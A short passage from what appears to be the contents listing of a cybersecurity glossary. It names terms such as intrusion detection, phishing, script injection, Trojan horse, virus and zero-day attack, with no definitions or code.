     • Identity
     • Incident
     • Intrusion (IDS & IPS)
     • MAC address
  68. Glossary
     • Password
     • Penetration
     • Phishing
     • Port
     • Protocol
     • Proxy Server
     • Reverse Engineering
     • Routers
     • Scan
     • Security Plan
     • Signature
     • Spam
     • Spoof
     • Script Injection
     • Tamper
     • Threat
     • Trojan Horse
     • User
     • URI & URL
     • Virus
     • Virtual Private Network
     • Web Server
     • Zero-day Attack
     • Zombie Computer
